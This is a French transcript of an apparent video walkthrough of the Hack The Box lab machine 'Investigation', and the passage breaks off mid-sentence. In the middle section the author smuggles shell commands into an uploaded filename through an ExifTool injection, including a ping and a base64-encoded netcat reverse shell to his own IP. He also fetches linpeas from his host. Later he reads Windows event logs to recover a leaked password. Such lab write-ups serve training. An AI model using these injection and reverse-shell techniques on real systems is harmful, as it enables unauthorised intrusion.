Et bonjour à vous, on se retrouve aujourd'hui pour une nouvelle vidéo sur la résolution de la box investigation sur Hackthebox, qui est une machine qui a été notée 4,4 sur 5 par les utilisateurs, par ceux qui l'ont réussi, donc c'est vraiment pas une mauvaise note. Elle est considérée comme étant médium ou on va dire plus note too easy, donc pas si facile que ça. Il y a 2400 personnes qui ont eu le user et presque autant qui ont eu le root, c'est-à-dire que le root n'est pas si compliqué à avoir par rapport au user et elle date d'il y a 34 jours. Au moment où je tourne cette vidéo, on est le 25 février, donc vous, quand vous verrez la vidéo, la machine sera déjà retirée parce qu'on n'a pas le droit de poster normalement les write-up des machines qui sont encore actives. Donc normalement, sur Hackthebox, si vous en avez un peu fait, vous savez que souvent le nom de la box donne quand même un indice sur ce qui va se passer dedans. Ici, investigation, au début, je pensais que ça allait être, on va dire, de l'OSINT ou essayer de chercher des informations sur Internet ou quoi. Mais en fait, c'est plus orienté Blue Team parce qu'il va y avoir de la recherche au niveau de log et aussi un petit peu de reverse engineering pour la fin. Donc vous verrez ça le moment venu. Donc la box, qu'est-ce qu'on a? On a une IP. Donc première chose à faire, une fois qu'on a l'IP, alors bien sûr, bien vérifier qu'on est connecté au VPN, moi c'est le cas. Hop. Première chose, une fois qu'on a l'IP, c'est aller l'ajouter dans le fichier etc.host, enfin etc.host. On va dedans, mais on peut voir que j'ai déjà ajouté là, au niveau de l'IP, donc ça c'est bon. Ensuite, deuxième chose à faire, qu'est-ce qu'on fait? Un petit nmap. Alors moi en l'occurrence, j'ai un alias qui s'appelle scan, on peut aller voir ce qu'il fait, qui est un alias à la commande nmap. Je laisse chercher. Hop. On peut voir ici, scan, en fait ça va faire un nmap-grand A, donc grand A pour le mode agressif. Qu'est-ce que ça fait? Ça va faire un S grand V, O, grand O pour l'OS. Euh, je crois que ça fait un traceroute et ça fait peut-être un template 4, tiré grand T4. Ensuite, on a le -P- pour scan tous les ports et l'option minrate que j'ai mis à 5000 pour scan beaucoup plus rapidement. Donc ça va essayer d'envoyer 5000 paquets au minimum par seconde. J'en profite aussi pour vous montrer la fonction fuse que j'avais ajoutée aussi en tant qu'alias. Enfin, c'est pas vraiment un alias, mais c'est une fonction que je peux réutiliser après dans le terminal et qui me permet de faire du fusing au niveau de web, au niveau d'un site web, en utilisant l'outil FUF. Donc voilà, j'ai passé l'option de l'URL, donc je passe ensuite à ma fonction fuse l'URL que je dois scanner, que je dois fuse. Je donne une wordlist par défaut qui est la big. Et ensuite, je teste aussi s'il y a des fichiers de type .html, .txt, .php, .zip dedans, au niveau de l'URL. Et ensuite, là, c'est des options que j'ai rajoutées en plus si jamais, moi, après, derrière, je dois rajouter d'autres options. Donc ceux-là, par défaut, ils sont pas utilisés. Voilà, donc ça, ce sera pour plus tard, mais je vous la montre déjà maintenant, comme ça, ce sera fait. Donc on va faire un petit scan sur la box investigation.htb. Voilà. Alors là, en l'occurrence, je vais pas laisser tourner, enfin, je peux laisser tourner, mais je vais directement vous montrer ce que ça nous ressort. Ça nous ressort ceci. Donc on peut voir qu'on a qu'un port 22 et qu'un port 80. Donc en soi, c'est assez peu, c'est on va dire du classique. On peut voir que sur le port 80, la version d'Apache c'est du 2.4.41, qui n'a pas l'air d'être une version vulnérable. Je crois que les dernières versions vulnérables, on pouvait faire une RCE dessus, c'était 48, 49, 50 ou quelque chose comme ça, autour de la 49, 50. Donc là, en l'occurrence, ça n'a pas l'air d'être le cas. Si on veut vérifier, on peut toujours faire une recherche sur Internet. Et on peut voir que normalement, ça redirecte vers eforensics.htb. Ok, donc là déjà, on sait que ça, on peut l'ajouter aussi dans notre fichier host. Alors, je vais réutiliser ça. nano/etc/host. Hop, et je vais rajouter derrière, comme étant un nouvel hôte. Voilà, eforensics.htb. Alors, on peut voir que du coup, le résultat, c'est exactement le même. Il y a un traceroute qui avait été fait. Il trouve que c'est du Linux. Il y a un traceroute, oui, l'OS Linux traceroute qui est fait. Bon, ça, on s'en fout un peu, vu que c'est sur notre réseau local. Et il y a les mêmes données qui ressortent. On peut tester aussi de se connecter en SSH. On sait qu'on a un port 22. J'aime bien faire ça au début de chaque box pour vraiment être sûr de ce qu'on cherche. Est-ce que on nous demande de nous connecter obligatoirement avec une clé privée? Et dans ce cas, on sait à peu près ce qu'on va aller chercher sur le site web. On va essayer de récupérer une clé privée. Peut-être que on va seulement nous demander un mot de passe. Après, ne nous demander qu'un mot de passe, ça ne veut pas dire qu'on ait besoin de clé privée. Mais en tout cas, on saura un peu plus vers où on va. Donc, investigation.actbox. Donc là, il me demande qu'un mot de passe. Donc,
Potentiellement pas besoin de clé privée, peut-être, mais on sait en tout cas, on ne nous force pas à en utiliser une. On nous donne déjà une information. Donc maintenant, on a, à mon avis, on peut pas faire grand-chose sur le port 22 actuellement, parce qu'on n'a pas de user, on n'a pas de mot de passe, on n'a absolument rien. On va essayer de se rendre sur le port 80. Donc le port 80, on va aller sur investigation.htb. Normalement, il n'y a aucun problème, parce que voilà, on se fait rediriger vers le eforensics.htb. Mais comme on l'a déjà ajouté à notre ETC host, bah on est redirigé correctement, il n'y a pas de problème. Ok, donc on arrive sur un site qui a l'air d'être qui propose des services de forensic. Donc, ok, on a des informations. On peut voir que là, en bas à gauche, au niveau du lien, si je clique dessus, ça nous redirige juste vers une encre plus bas dans la page. Voilà, pricing, machin, ça marche pas. Ici, on a peut-être des users, potentiellement des users, mais ça a l'air plus d'être des commentaires un peu aléatoires. Et ici, on a Free Service qui nous redirige vers une autre page cette fois-ci, qui est /service.html. Ok, donc ça fait du forensic sur des images. Donc là, ici, on peut voir qu'on a un upload de fichiers qui nous dit uploader une image va nous donner des détails, enfin, va nous fournir une analyse forensique détaillée au niveau de l'image. Et ça peut prendre, à ce moment-là, de l'upload, on peut prendre que enfin, ça accepte que des images JPG. Alors, peut-être une vulnérabilité au niveau de l'upload, on verra ça plus tard. Peut-être qu'on peut upload un fichier PHP ou quelque chose d'autre qu'une image pour avoir un reverse shell ou avoir accès directement à la machine. On peut regarder aussi au niveau du code source, sur cette page-là. Peut-être qu'on a des informations supplémentaires, des liens qui ne sont pas affichés, qui ne sont pas cliquables au niveau de la GUI, mais qu'on peut avoir accès au niveau du code source. Peut-être des mots de passe qui ont été intégrés dedans. Là, en l'occurrence, il n'y a rien de vraiment très intéressant. On peut voir que une fois qu'on clique sur Upload, ici, ce sera la page upload.php qui sera appelée. Bon, comme c'est du PHP, on ne peut pas voir le code source. Ça ne va pas nous donner beaucoup plus d'informations. Upload.php, voilà. Bon. Si on va sur la page sans regarder le code source, normalement, on n'aura rien de précis. Voilà, en fait, ça appelle la même page qui dit invalide tab file parce qu'en fait, on n'a rien donné. Donc voilà, par rapport au site web, ce qu'on peut faire aussi, c'est du coup lancer un fusing de directory web. Donc peut-être qu'il y a des dossiers ou des fichiers qui sont cachés, mais auxquels on n'a pas accès. Donc on peut regarder s'il y a un robot.txt déjà à la main. Robot.txt, il n'y en a pas. Bon, on peut lancer alors soit un dirbuster, soit comme je vous l'ai montré avant, du fuf, avec la commande que j'ai mise dans en tant qu'alias, qui est fuse. Donc là, je donne l'URL, qui est eforensics.htb. Là, en l'occurrence, je donne que le nom de domaine, mais voilà. On va attendre. Vous verrez que en fait, il va retourner que ça. Que les 4 pages web qu'on a vues, il n'y a rien de vraiment intéressant. Donc ça, c'est un dossier, mais qui ne contient rien d'intéressant. Voilà, il va trouver que ça. Bon, on va laisser tourner. En attendant, ce qu'on peut faire, du coup, c'est essayer ce service, parce qu'il y a l'air d'avoir que ça sur ce site web. Peut-être que on va essayer d'utiliser, on va dire, le service proprement. Peut-être que ça va nous donner des informations sur l'image et nous fournir des numéros de version ou des choses en plus. Alors moi, en l'occurrence, normalement, j'avais déjà... Alors ça, on peut l'arrêter, parce que finalement, on va trouver que ça sert à rien de le laisser tourner. Donc, on va se rendre au niveau de hack de box, notre box qui s'appelle investigation. Et on va essayer d'upload une image. Ici, hop, copie, CTRL-C, CTRL-V. Je vais la rename image.jpg. Hop, voilà. On va tenter de l'upload pour voir ce qui se passe. Browse. Image.jpg. Donc on voit que c'est une image classique. Upload. Voilà, donc notre image JPG a été uploadée. On peut aller voir le rapport d'analyse ici. Donc on peut voir déjà qu'il a enlevé le point, il a enlevé un caractère spécial, ok. Et si on clique dessus, ça nous emmène vers un répertoire qui s'appelle Analyzed Images, ok, et image jpg.txt. Donc ça a enlevé le point, les caractères spéciaux, et ça a rajouté à la fin .txt. Peut-être qu'on peut l'utiliser après pour faire de l'exploit, pour bypass certaines choses. On va garder ça de côté pour l'instant, on va essayer de voir peut-être qu'on peut voir d'autres images qui ont été uploadées dans le même répertoire. Bon, en l'occurrence là c'est interdit. On pourrait essayer, parce que là on y a accès via un get, on pourrait essayer de bypass ce forbidden en faisant une requête. Alors post ça risque peut-être pas de fonctionner, mais en faisant un head,
en changeant la méthode HTTP pour y accéder. Bon, là, en l'occurrence, ça ne marchera pas. Donc, qu'est-ce qu'on a? En fait, on voit, là, on comprend que l'image qu'on donne, l'outil derrière, qu'est-ce qu'il fait? Il fait un EXIF tool dessus. Il fait un EXIF tool sur l'image, il nous donne les informations qui sont retournées. Donc, ça peut être des métadatas. En l'occurrence, il n'y a rien de vraiment intéressant, mais on voit qu'on a une version d'EXIF tool. Donc là, notre phase d'énumération nous donne quelque chose de supplémentaire. Ok? Donc là, le piège, c'est de réussir à faire une injection au niveau du fichier qu'on donne pour que quand ExifTool l'utilise dessus, ça exécute quelque chose. Peut-être que c'est possible. On a une numéro de version, on peut voir s'il y a une vulnérabilité qui est associée à ça. Si on tape ExifTool sur Internet avec le numéro de version et le fameux exploit derrière, est-ce qu'on trouve quelque chose d'intéressant? Là, on a une commande d'injection ExifTool, vulnerabilities ExifTool. Là, on a arbitrary code exécution, donc ça peut être vachement utile aussi. On a RCE. Hop. Alors là, le problème, c'est qu'on voit qu'on a une RCE qui peut être vraiment pas mal, avec un CE 2021 machin, mais c'est du ExifTool 12.23. Donc en l'occurrence, j'imagine que ça a déjà été fixe. Voilà, là c'est une ancienne version, donc à mon avis, ce sera pas bon pour nous. Là, c'est la même CVE qu'avant, donc c'est encore une version qui est inférieure à celle qu'on a, donc enfin antérieure, donc je pense pas que voilà, update, ça a été update à ce moment-là, donc normalement c'est mort. Et ici, on peut voir que par contre, ExifTool version inférieure à 12.38, c'est vulnérable à une commande d'injection à travers le nom de fichier qui a été créé. Donc en fait, ils nous disent que si le nom de fichier qu'on donne à ExifTool, il se termine avec un pipe, alors il y a une injection de commande qui peut être faite au niveau du système d'exploitation. Et là, il nous donne un exemple. Si par exemple, donc là, le proof de concept, donc il nous montre comment ça fonctionne. Donc ici, l'utilisateur va faire un ls du fichier, voir s'il y a un fichier pawn qui existe. Là, en l'occurrence, nous disent que ça n'existe pas. Il va créer un fichier de la commande qui doit être exécutée qui termine par un pipe. Donc ça, c'est un fichier qui s'appelle touchpawn qui termine par un pipe. Il va donner ce fichier-là à ExifTool. Donc ExifTool, on voit bien que c'est la version 12.37. Le nom du fichier, c'est bien ce qu'on a donné là. Et ensuite, une fois que ça a été exécuté, il refait un lspawn et on voit bien que le fichier a été créé. C'est-à-dire que le binaire ExifTool, qui est vulnérable, qui est en 12.37, le binaire ExifTool, quand on lui a passé ce nom de fichier-là, lui, qu'est-ce qu'il a fait? En fait, il a exécuté la commande touchpawn qui crée un fichier qui s'appelle pawn. Voilà. Donc en l'occurrence, ça, c'est la même version que nous. Ça peut être utile. Ça peut être utile, ça peut nous servir à faire des choses. Alors, vous verrez, moi, au niveau du write-up, ici, j'avais essayé d'utiliser la CVE qu'on avait vue avant, 2021, sauf que c'était pas la bonne version, donc forcément, ça fonctionnait pas. Et ensuite, j'ai trouvé ce GitHub-là, où le mec, il donne sa proof of concept, tout ça. Donc ça peut être quelque chose qui est vachement utile et qui peut nous servir plus tard. Le problème ici, c'est qu'on peut pas trop tester au niveau de ce que ça nous retourne. Pourquoi? Parce que, en fait, ici, ça va créer un truc sur le système, mais on n'a pas forcément de retour. Il y a juste le retour de la commande. Ça peut être exécuté en fond. Donc, ce qu'on peut tester, par exemple, c'est, on reprend notre image, hop, on la copie-colle. Ouais, on va le faire comme ça, on va la copier-coller. Je me rends dans le répertoire Hack the Box, Box, Investigation, et on va la rename, on va rename notre image copie machin. Qu'est-ce qu'on va la rename? Alors, la commande qu'on veut exécuter, alors on le met entre guillemets simple pour pas que ce soit exécuté. Par exemple, on peut tenter de faire un ping vers notre machine et voir si on a le résultat, si on a le retour. Si c'est le cas, ça veut dire que la commande ping est bien exécutée sur le serveur et qu'on a directement accès à lui et qu'on pourra exécuter du coup d'autres commandes comme un reverse shell par exemple. Donc là, si je fais un IP-CA pour voir mon adresse IP au niveau du VPN, je suis en 10.10.14.2. Donc là, on va faire un ping-c5 par exemple pour envoyer 5 pings vers 10.10.14.2. Et on n'oublie pas de terminer par un pipe pour que ce soit vulnérable. Alors là, en l'occurrence, j'ai fait un RM, mais c'est un move que je voulais faire. ls-là, on peut voir que là, du coup, j'ai bien mon fichier qui s'appelle ping. Qu'est-ce que je vais faire? Je vais faire un sudo tcp dump-i 0 icmp. Qu'est-ce que ça va faire cette commande? Donc je lance en sudo, donc avec les droits route,
TCP dump, en fait, c'est un outil qui va nous permettre de faire de la capture de trafic réseau. Donc je dis que j'écoute tout ce qui se passe sur le Tune 0. Tune 0, c'est mon interface VPN. Donc j'écoute tout ce qui se passe sur le VPN et je filtre les paquets ICMP pour n'afficher que. ICMP, c'est le ping. Donc en gros, hop, je lance cette commande et je vais écouter le ping sur le Tune 0, sur mon interface VPN. Donc ça, c'est bon. Maintenant, qu'est-ce qu'on va faire? On va se rendre sur le site, on va retourner en arrière et on va tenter d'upload ma nouvelle image qui s'appelle maintenant ping-c5 avec mon adresse IP. Est-ce que ça va fonctionner? Est-ce que ça commence à exécuter? On va voir ça tout de suite. Alors là, ça prend un peu de temps à charger. Que ça prend du temps, c'est bon signe. Ok, ping machin has been uploaded. Si on va voir le résultat, file name, on a bien le nom là, donc il n'y a rien qui a été supprimé. On peut voir ici que là, il n'y avait rien qui avait été supprimé non plus. On a bien le nom de fichier, donc ça a l'air d'avoir fonctionné. Et si on va voir notre résultat, qu'est-ce qu'on a? Ici, on peut voir qu'on a bien des requêtes qui ont été passées du hostname investigation.htb vers pentest. Alors pentest, c'est le nom de ma machine. Donc on peut voir qu'il y a bien une requête qui a été faite. En l'occurrence, là, on a 1, 2, 3, 4 et 5 pings qui ont été envoyés vers moi. Donc, les 5 pings qu'on a fait ici. Ça veut dire que maintenant, on peut exécuter des commandes. Alors maintenant qu'on a ça, maintenant qu'on sait qu'on peut exécuter des commandes sur la machine et qu'on y a accès, bah l'objectif, ça va être de chercher à avoir un reverse shell pour avoir un accès directement à la machine et pouvoir exécuter d'autres commandes dessus. Alors, j'ai fait plusieurs tests de mon côté, et ce qui a fonctionné, c'est, ce que vous pouvez voir là, c'est celui qui s'appelle tout ça, donc c'est un peu bizarre, ici. En l'occurrence, ce nom de fichier-là, qu'est-ce que c'est si on le découpe? En fait, pourquoi j'ai utilisé du base, ça c'est du base 64. Pourquoi j'ai utilisé du base 64 pour exécuter cette commande? Parce que sinon, le reverse shell de base, c'était celui-ci. Hop, il est assez connu. Donc en créant un MKFIFO, un fichier partagé, tout ça, en utilisant le netcat, là il y a des caractères spéciaux, il y a des points-virgules, il y a des slash, il y a des pipes, il y a d'autres pipes, donc ça peut rentrer en conflit. Donc en fait, on encode ça en base 64 pour qu'il n'y ait plus que des caractères normaux. Et sur la machine cible, on décode le base 64 et on l'exécute. Voilà. En l'occurrence, ici, c'est bien parce qu'on peut voir que dans le fichier, dans le nom du fichier qu'on va passer à ExifTool, il peut y avoir plusieurs pipes, ça pose pas de problème. Donc maintenant, si on fait un test de ce fichier-là, donc ça va afficher, je vais vous montrer comment ça fonctionne, mais echo ça va juste nous l'afficher. Echo, si je passe un pipe base64-d, ça va décoder la chaîne là et ça va l'afficher. Donc ça va afficher ça. Et comme derrière, je rajoute encore un pipe sh, c'est que cette commande-là, ça va l'exécuter sur la machine. Voilà, tout simplement. Donc avant de l'exécuter, évidemment, il faut que je me mette en écoute ce port 4444 parce que je l'ai spécifié ici. Et si ça fonctionne, je vais mettre comme ça, si ça fonctionne, normalement, ça va m'ouvrir une connexion et ça va m'ouvrir un reverse shell sur la machine. Donc on retourne, ça on peut fermer, ça on peut fermer. On retourne sur notre site pour upload le fichier. Je upload le fameux fichier qui a un nom à rallonge. Je tente de l'upload. Faut voir que ça charge. Là, il y a l'air de rien se passer, mais on n'oublie pas qu'en fait, un reverse shell, c'est une connexion qui est constante et du coup, la connexion n'est pas coupée au niveau du site web. Donc, si on retourne ici, on peut voir que j'ai bien reçu une connexion de la box et que j'ai un shell sur la machine. Maintenant, si je tape par exemple ID, on peut voir que je suis bien connecté en 3W data. Donc là, j'ai un reverse shell sur la machine. Ok. Bon, notre reverse shell, il est un peu dégueulasse. Donc, ce qu'on peut faire, c'est essayer d'avoir un shell un peu plus stable. Donc Python 3-c import pty pty.spawn /bin/bash. Voilà. Là, on peut voir qu'on a un shell déjà un peu plus propre. On peut agrandir aussi. Là, on est où? pwd, on est dans var3w upload. Ok, si on prend ls-là, on voit notre fichier qu'on vient d'upload. On peut retourner en arrière. Alors j'ai ma touche espace qui commence à bugger, c'est un peu chiant ça, je sais pas pourquoi. ls-là, ok, donc il y a d'autres répertoires. Là on peut commencer déjà à faire de l'énumération parce qu'on a accès à la box. On peut aller dans le HTML, on est dans l'upload.
peut-être qu'on a des fichiers en plus qu'on n'avait pas, auxquels on n'avait pas accès. Donc on a bien le analyse d'image, asset, machin, bidule, ok. Peut-être que ça peut être intéressant parce qu'on était en Forbidden avant là-dedans. Mais ok, bah c'est les images en fait, c'est les résultats des commandes qu'on a rentrées, les 3 trucs qu'on a mis, donc ça n'a pas de grand intérêt. Il n'y a rien de supplémentaire. Alors maintenant, le but, ça va être d'essayer d'avoir accès à un user, faire de l'escalation de privilèges, pour avoir accès à un autre user qui a plus de droits. Si on va voir dans ETC base WD, pour voir la liste des utilisateurs, bon, il y a le fameux root. On peut regarder ici un autre utilisateur auquel on peut se connecter parce qu'il a un bin bash et que c'est un utilisateur de base parce qu'il a l'ID 1000. On rappelle sous Linux, quand on crée un nouvel utilisateur, on va dire humain, on peut y avoir accès, enfin, l'ID par défaut qui lui est attribué c'est 1000. Si on en crée un autre, c'est 1001, 1002, ainsi de suite. Donc ici, on peut voir que les autres ils sont en dessous de 1000, donc il n'y a aucun autre utilisateur, on va dire humain sur la machine, il n'y a que le suivant. Donc S-Morton, ça peut être une cible au niveau de notre privilège escalation. Si on tente d'aller dans son home, cd/home, on peut vérifier qu'il n'y a pas d'autres utilisateurs, et si on tente d'aller dedans, on n'a pas les droits. Ok, donc là on est bloqué en tant que 3W data. On peut commencer à faire de l'énumération, on va dire classique. Le fameux sudo-l. Là, en l'occurrence, en tant que wdata, on ne devrait pas avoir le droit de le faire, mais des fois on a le droit. Là, en l'occurrence, il nous demande un mot de passe. Sauf que comme c'est un service de machine, on n'a pas de mot de passe lié à 3W-data, donc c'est pas possible. On peut aussi regarder au fichier des binaires SUID. Peut-être qu'il y en a qui sont positionnés et alors, -perm et qui ne devraient pas. /nul. Là, vous verrez que ça donne pas beaucoup d'informations utiles. C'est les trucs de base qu'on peut pas exploiter. Ok. Donc là, ce qu'on peut faire, soit on continue d'énumérer manuellement à la main, soit on peut tenter d'utiliser un outil comme Limpiz, que j'utilise presque tout le temps à chaque fois que je fais une box, sous Linux, qui nous permet d'énumérer de manière automatisée. Donc on va se rendre dans /tmp. Ici, on va se rendre à l'endroit où se trouve notre fichier Limpiz. On peut voir que là, j'ai bien le limpiz.sh. Je vais me faire un petit serveur HTTP juste pour transférer notre fichier. Donc là, je wget http l'adresse de ma box, 14.2.8000 et je veux dl limpiz.sh. Voilà, j'ai téléchargé, donc ça on peut quitter ensuite. Maintenant, il est dans notre TMP, on lui donne les droits d'exécution avec chmod +x limpiz. On l'exécute et on attend le résultat. Peut-être qu'on aura des choses qui vont être utiles. Hop, alors on remonte. Alors, est-ce qu'on a des choses utiles? Ici, en l'occurrence, on nous dit qu'on est 3W data, si on le savait. On nous donne la version du système. Ok. Bon, ça ne nous intéresse pas énormément. Là, c'est les informations classiques. Install compiler. Ok. Des informations, les process, tout ça. Bon, bref. Et ici, on peut voir ce qui nous intéresse. C'est que, en fait, au niveau du cron tab, on a un cron tab qui tourne assez régulièrement. Alors, je crois que c'est, je sais plus si c'est toutes les 5 minutes ou quelque chose comme ça. Ou je sais plus exactement à quoi ça correspond, le truc divisé par 5, mais bref. Et ça va exécuter la commande date qu'on va envoyer. Alors là, on a un timeout derrière, on peut voir, mais c'est normal, c'est parce qu'au bout d'un moment, ça casse, mais on a toujours notre shell, le shell n'est pas cassé. Donc la commande date va être mise dans le fichier analyzed log qui se trouve dans user local investigation. Et ensuite, on va afficher la commande, enfin, on va afficher la chaîne de caractères clearing folders qu'on va encore mettre là-dedans, dans le même fichier, et on va exécuter la commande rm-r upload et également analyze l'image. Donc en fait, ça, qu'est-ce que ça va faire? Ça va juste supprimer le contenu du fichier upload, enfin du dossier upload et analyze l'image au niveau de notre service web, et ça va ajouter au niveau des logs, comme quoi ça a bien été supprimé. Donc là, ça peut être intéressant. Bon, je vous spoil un peu, il n'y a rien d'autre qui est intéressant sur la box. On peut continuer de regarder s'il y a des fichiers, des machins, des trucs qui ont été trouvés, mais bon, là en l'occurrence, il n'y aura rien de spécifique. Hop, je casse mon shell, mais juste pour le relancer, normalement, c'est assez rapide. Hop, là on a de nouveau nos shells. Je vais refaire le Python 3 pour retrouver un shell, on va dire classique, -c import
pty.spawn /dm/bash. Voilà. On retourne dans notre PMP. Et maintenant, si on veut aller dans le user local investigation, qui était l'endroit où se situait le fichier de log, on fait un ls-là. Qu'est-ce qu'on a? On a notre fameux répertoire analyzed log, enfin notre fichier qui contient 0 octet. Donc, bon, on peut essayer de le cat, mais il ne se passe rien parce qu'il est vide. Mais on a un autre fichier qui s'appelle Windows Event Logs for Analysis.message, qui peut être intéressant, qui appartient à S. Morton, donc c'est encore plus intéressant. Si on fait un file dessus pour voir quel type de fichier c'est, qu'est-ce qu'on apprend? Alors on apprend que ça lag déjà. Ok, donc pour une raison obscure, je sais pas pourquoi j'ai dû casser le shell et le relancer parce que ça voulait plus fonctionner. Donc là, qu'est-ce qu'on apprend? On apprend qu'en fait, ça, le nom de fichier là, c'est quelque chose, un message Outlook au niveau de Microsoft. Ok, bon, ça paraît bizarre. Peut-être qu'on peut avoir des informations dedans. Si je tente de faire un cat du message, j'ai des caractères qui sont invisibles. Ok, bah c'est un peu illisible. Peut-être qu'on peut quand même retrouver des informations qui sont utiles dedans. Là, à la fin, on voit SMTP Steve Morton iPhone6.htb. Ok. Si je tente de faire un string dessus, strings du fichier. Alors attendez, parce que là, du coup, ça a cassé à peu près tout. Voilà. Si je fais un string de ça, qu'est-ce qui se passe? Peut-être qu'on peut avoir des informations intéressantes. Alors, je ne vais pas monter tout en haut parce qu'en haut, il n'y a rien. Mais ici, on peut voir qu'on a un security.evtx. EVTX, qu'est-ce que c'est? C'est une extension de fichier au niveau de Windows qui permet de visualiser les logs. C'est un fichier de rétention de logs au niveau de Windows. Et ici, on a un SMTP, donc serveur web, n'importe quoi, serveur de mail, Steve Morton forensics.htb. Ok. En l'occurrence, si on va faire des recherches sur Internet, on se rend compte que le fichier de type Microsoft Outlook Message, ça peut être visualisé au niveau d'Outlook. Alors moi, j'ai la flemme d'utiliser mon propre Outlook pour visualiser ça. Donc qu'est-ce qu'on peut faire? On peut utiliser des outils qui sont directement en ligne et des sites web qui existent en fait. Alors attendez, est-ce que, voilà, par exemple ici, on peut se rendre sur des sites qui nous permettent de visualiser directement ça. Donc là, on peut voir que c'est View Message Online. On peut faire glisser-déposer. Alors évidemment, depuis la machine, là, on ne peut pas y avoir directement accès. Donc qu'est-ce qu'il faut faire? Il faut setup un petit serveur web et ensuite le télécharger sur notre box pour ensuite le clone. Mais ça se fait en une commande, donc il n'y a aucun souci. Donc on peut lui donner le message à lire. On va attendre que ça le fasse, que ça le read, et ensuite on a le résultat. Voilà, donc là si on zoome un peu plus pour voir de plus près, donc c'est envoyé d'une personne qui s'appelle Thomas Jones à Steve Morton, donc l'utilisateur de notre machine. Le sujet c'est Windows Event Logs for Analysis, donc le nom de notre fichier. Ici on a un attachment, evtx-logs.zip, ça nous intéresse. Parce que si on arrive à avoir accès, peut-être qu'on pourra voir les fichiers de log et dedans récupérer des informations pertinentes. Et il nous demande, en fait, c'est Tom, il nous demande de regarder au niveau des logs pour voir si les analystes qui monitorent d'habitude le site ou le terminal, en gros, est-ce qu'il doit vérifier s'ils suivent bien les procédures de transfert de data, parce qu'il a peur qu'ils ne les suivent pas. Voilà. Donc il nous demande de faire ça. Donc là, on n'a pas plus d'informations, on n'a pas de mot de passe, on n'a rien d'intéressant, sauf l'attachment, donc qui est un fichier zip qu'on va essayer de récupérer. Donc là, encore une fois, en l'occurrence, il y a d'autres sites web qui nous permettent de récupérer ce fichier zip. Donc, par exemple ici, alors je vais le voir dans un nouvel onglet, on a ce site-là qui nous permet en fait de déposer directement notre fichier Outlook et de le parser, donc de récupérer les fichiers à télécharger, les pièces jointes. Hop, ici on peut cliquer sur Download Now, ça va nous télécharger les pièces jointes. Donc là en l'occurrence j'ai déjà fait, c'est eventx-logs.zip. Une fois qu'on a ce fichier là, qu'est-ce qu'on fait? On peut passer sous Windows. Alors attendez, je vais retourner sur mon investigation. ls-là, qu'est-ce qu'on a? On a le fichier zip. On peut vérifier que c'est bien un fichier zip, machin. Ok. On peut le unzip. Alors moi je vais pas le faire parce que je l'ai déjà fait, mais on l'unzip.
Et dedans, qu'est-ce qu'on retrouve? On retrouve notre security.evtx. Si on fait un file sur notre security.evtx, on voit que c'est Windows Vista Event Log, donc c'est bien un fichier de log, et on va pouvoir le visualiser directement sur Windows. Alors, il y a plusieurs manières de faire. Soit vous utilisez un outil qui permet d'exporter sous Linux directement les logs sous format XML, mais le problème c'est que le format XML c'est illisible, vous allez avoir un fichier énorme et pour retrouver l'info dedans, bonne chance. Bon, s'il y a 3 logs, ça va être simple. S'il y en a 200 000, ça va être vraiment plus compliqué. Donc moi, ce que j'avais fait, c'est que j'ai transféré directement le fichier sur une machine Windows et je l'ai ouvert avec le gestionnaire de log de base de Windows. Donc on va se retrouver sur ma machine Windows et on va voir ça ensemble. Ok, donc on est de retour sur Windows. Maintenant, on peut voir que j'ai ouvert l'observateur d'éléments pour récupérer notre fichier. Qu'est-ce qu'on fait en fait? Il faut faire fichier, non, il faut faire ouvrir le journal enregistré et ouvrir notre fameux fichier qu'on aura transféré sur la machine. Ensuite, qu'est-ce qu'on a? On peut voir que du coup, on a 20 000 événements qui se sont passés. 20 000 événements, c'est beaucoup. Vous voyez que si on scrolle, ça peut prendre beaucoup de temps pour trouver l'information qu'on veut. Moi, en l'occurrence, j'ai jamais trop fait de, on va dire, de forensic au niveau de Windows, donc je ne savais pas quel événement chercher. Qu'est-ce que j'ai fait? J'ai filtré par catégorie de la tâche, ici, à droite, et j'ai regardé les tâches qui pouvaient m'intéresser. À savoir que au niveau des événements Windows, les informations qui sont loguées, qui sont stockées, ça peut être tout et n'importe quoi. Une création de fichier, un changement de mot de passe, quand on se connecte avec un utilisateur, etc. Ici, en l'occurrence, le problème, c'est que je savais pas trop quoi chercher et que au niveau des événements, ce qui est logué, au niveau des informations auxquelles on peut accéder, il y a potentiellement le nom d'utilisateur, mais par exemple, si un utilisateur choisit de modifier un mot de passe, on n'a pas accès au mot de passe. C'est quand même sécurisé, on ne peut pas voir les données qui ont été modifiées. Pareil au niveau des fichiers, si un fichier a été modifié, on ne peut pas voir son contenu. On ne peut voir que les informations principales. Mais on n'oublie pas que le mail qu'on a reçu, c'est Tom qui nous demandait de vérifier si les gens s'étaient bien connectés au niveau de la machine pour voir si ils avaient suivi les procédures de transfert. Donc la tâche, celle qui peut nous intéresser, c'est credential validation. Pourquoi? Parce qu'on peut voir que en fait c'est une tentative de connexion. Voilà, l'ordinateur a tenté de valider les informations d'identification d'un compte. Donc ici on peut voir que L. Jenkins, qui est le nom d'utilisateur, il a tenté de se connecter sur la station de travail eforensics.di et le code d'erreur 0, ça veut dire que 0, il n'y a pas de code d'erreur, donc il a réussi. On peut voir ici qu'il y a HMR Alley qui a tenté de se connecter, mais là apparemment il y a une erreur. Et derrière, il a tenté de se reconnecter et il a réussi. Pourquoi? Parce qu'en fait, on peut voir qu'ici, il y a 2 lettres qui ont été inversées. Ouais, bon, bref, il y a eu une inversion de lettres, et du coup, juste il s'était trompé. Mais là, il a réussi. On peut voir aussi au niveau du temps, il a tenté de se connecter à 18h50, il n'a pas réussi. Il a retenté à 18h50 et 29 secondes, là, cette fois-ci, il a réussi. Donc ainsi de suite, on peut voir que S. Morton, il a tenté de se connecter, ainsi de suite. L. Jenkins, ça nous permet de récupérer de potentiels utilisateurs aussi. Bon, le problème, c'est qu'on peut voir qu'en fait, sur notre box, nous, de la Linux, il n'y avait que S. Morton qui était vraiment un utilisateur existant. Tout le reste n'existait pas. On a Anderson, encore Anderson, S. Morton, L. Monroe, L. Monroe. Et là, on a un truc qui peut être intéressant qui a l'air d'être default forensic pass. Ok, ça peut être intéressant. Et on peut voir qu'il y a un code d'erreur, donc c'est pas le bon, que la personne a tenté de se connecter à 21h15 et 15 secondes, et que derrière, l'utilisateur a tenté de se reconnecter, mais cette fois-ci, il a réussi. Alors, qu'est-ce qu'on peut en déduire? On peut en déduire qu'en fait, la personne qui a tenté de se connecter a mis le mot de passe à la place de l'utilisateur, parce qu'elle s'est trompée, elle était un peu fatiguée, il était 21h, il était tard. La personne a voulu mettre son utilisateur au lieu de son mot de passe, mais 